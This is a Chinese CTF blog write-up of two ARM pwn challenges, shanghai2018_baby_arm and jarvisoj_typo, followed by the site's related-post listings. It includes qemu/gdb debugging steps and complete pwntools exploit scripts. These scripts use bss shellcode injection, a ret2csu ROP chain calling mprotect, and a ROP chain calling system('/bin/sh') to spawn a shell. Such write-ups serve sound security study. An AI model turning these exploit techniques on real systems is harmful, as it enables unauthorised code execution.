shanghai2018_baby_arm,jarvisoj_typo(armrop)

已于 2022-09-23 22:32:18 修改
阅读量181 收藏
点赞数
分类专栏: PWN 文章标签: arm pwn
于 2022-09-20 16:17:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/126954854
版权

shanghai2018_baby_arm,jarvisoj_typo

shanghai2018_baby_arm:

程序分析:

先安装好一些环境,可以看这位师傅
https://blog.csdn.net/A951860555/article/details/116780827
安装好qemu后

qemu-aarch64 -L /usr/aarch64-linux-gnu/ ./pwn

运行程序
请添加图片描述
结合ida,可以发现
第一个输入点写入bss段
第二个输入点可以溢出

攻击方法:

无非就是bss段写shellcode,栈溢出跳到那里执行

gdb调试:

gdb调试下看看
先开端口

qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu/ ./pwn

再打开

gdb-multiarch

接收端口

target remote localhost:1234

然后vmmap可以看到其实bss段是可读可写可执行的
请添加图片描述
再接着我们确定溢出请添加图片描述

请添加图片描述
请添加图片描述
溢出为72

exp:

from pwn import*
r= process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#r=remote('node4.buuoj.cn',28119)
elf = ELF('./pwn')
context.log_level = "debug"
context.binary = "./pwn"
shell=asm(shellcraft.sh())
r.sendlineafter('Name:',shell)
payload=cyclic(72)+p64(0x411068)
r.sendline(payload)
#gdb.attach(r)
r.interactive()

网上都是用ret2csu,控制 mprotect 提权取getshell
具体操作可以看这位师傅,讲的很清楚
https://blog.csdn.net/qq_41202237/article/details/118518498

from pwn import*
r= process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#r=remote('node4.buuoj.cn',28119)
elf = ELF('./pwn')
context.log_level = "debug"
context.binary = "./pwn"
shell=p64(elf.plt['mprotect'])+asm(shellcraft.sh())
r.sendlineafter('Name:',shell)
#----------------------------
csu_down=0x4008CC
csu_up=0x4008AC
mprotect_addr=0x411068
shell_addr=0x411068+8
def csu_rop(fun,v1,v2,v3):
    csu_down=0x4008CC
    csu_up=0x4008AC
    payload=p64(csu_down)+'b'*8+p64(csu_up)+p64(0)+p64(1)
    payload+=p64(fun)+p64(v3)+p64(v2)+p64(v1)
    return payload
payload=cyclic(72)+csu_rop(mprotect_addr,shell_addr,0x1000,7)+'b'*8+p64(shell_addr)

r.sendline(payload)
#gdb.attach(r)
r.interactive()

jarvisoj_typo:

程序分析:

就是一个32位静态编译的arm架构程序
然后能溢出请添加图片描述
确定padding长度
请添加图片描述

exp:

from pwn import*
r= process(["qemu-arm","./typo"])
r=remote('node4.buuoj.cn',29543)
elf = ELF('./typo')
context.log_level = "debug"
context.binary = "./typo"
r.sendlineafter('Input ~ if you want to quit','')
#ROPgadget --binary ./typo --string '/bin/sh'
binsh=0x6c384
#ida先shift+F12,再alt+t找'/bin/sh',再找到它所在的函数就是system
system=0x10ba8
#ROPgadget --binary ./typo --only 'pop'
pop_r0_r4_pc=0x20904
payload=cyclic(112)+p32(pop_r0_r4_pc)+p32(binsh)+p32(0)+p32(system)
r.sendline(payload)
#gdb.attach(r)
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shanghai2018_baby_arm
06-03
arm64架构的pwn题
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
ARM PWN:Shanghai2018_baby_arm详细讲解
hollk’s blog
07-06 1337
这是一道aarch64的PWN题目,依然觉得和x86没什么太大的区别,aarch64程序中也存在类似x86下csu_init的gadget。有区别的地方在于aarch64寄存器和汇编指令集,如果x86汇编指令集比较熟悉的话,找一篇关于aarch64的,看一看就很容易理解了
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1757
做arm架构下的pwn题某个报错
BUUCTF-pwn(14)
njh18790816639的博客
01-23 3502
gwctf_2019_jiandan_pwn1 简单ret2libc,唯一需要注意的便是注意修改索引值,防止索引被覆盖!从而无法进行栈溢出! from pwn import * from LibcSearcher import LibcSearcher context(os='linux',arch='amd64',log_level='debug') binary = './pwn' r = remote('node4.buuoj.cn',25586) #r = process(binary) elf
通过一道ARM PWN题引发的思考:jarvisOJ_typo
hollk’s blog
06-28 1314
最近做了一道ARM架构的PWN题,给我带来很多的思考。为什么要做ARM的呢?因为在很久之前就提及过想要向IoT漏洞挖掘方面进行延展,并且有过一段时间去复现一些路由器的漏洞,但是感觉基础并不是很扎实。所以这段时间潜心学习ARM寄存器及指令集,并且通过接下来的这道ARM PWN题进行实践与摸索,文章的末尾也会列出通过这道题带来的一些感悟 希望我们都能找到自己的方向,按照计划不断前行。编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
PWN-ARM-jarvisOJ_typo学习
重启专家的博客
12-07 321
PWN-ARM-jarvisOJ_typo学习
newsletter_subscribe:TYPO3延伸
03-22
订阅TYPO3> = 9.5的新闻通讯 取决于tt_address 计划程序任务,用于在一段时间后删除未确认的订户(自v3.1.0起) 它有什么作用? 提供插件以双重订阅 提供一个插件,可以双重取消订阅 在tt_address中提供字段以在...
kio_typo3-开源
05-13
标题中的“kio_typo3”是一个开源项目,专门针对TYPO3内容管理系统设计。TYPO3是一款流行的开源CMS,用于构建复杂的企业级网站和内容管理解决方案。这个项目的主要目的是使TYPO3的模板和文件结构能够通过KDE桌面环境...
frontend_editing:TYPO3 CMS前端编辑
04-28
TYPO3 CMS是一款强大的开源内容管理系统,它为网站管理员和开发者提供了丰富的功能,包括高级内容管理、灵活的权限系统以及可扩展性。在标题提到的"frontend_editing:TYPO3 CMS前端编辑"中,我们主要关注的是TYPO3的...
typo3_encore:在TYPO3中使用Webpack Encore
02-05
TYPO3与Webpack Encore集成! 通过此扩展,您可以通过阅读entrypoints.json文件并帮助您呈现所需的所有动态script和link标签来使用的splitEntryChunks()功能。 composer require ssch/typo3-encore如何使用首先按照...
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3195
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2747
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1750
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn。
house of cat 学习
m0_51251108的博客
10-13 1164
house of cat的利用链学习
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1152
CISCN2021pwn pwny(数组越界,劫持exit_hook)
用patchelf改程序后在exp中用gdb.attach()调试堆栈
m0_51251108的博客
09-28 1058
用patchelf改程序后在exp中用gdb.attach()调试堆栈
_this.$set is not a function
最新发布
05-28
Another possible cause is that there is a syntax error or typo in your code that is preventing the Vue.js framework from recognizing _this.$set as a valid function. To fix this error, you can try ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值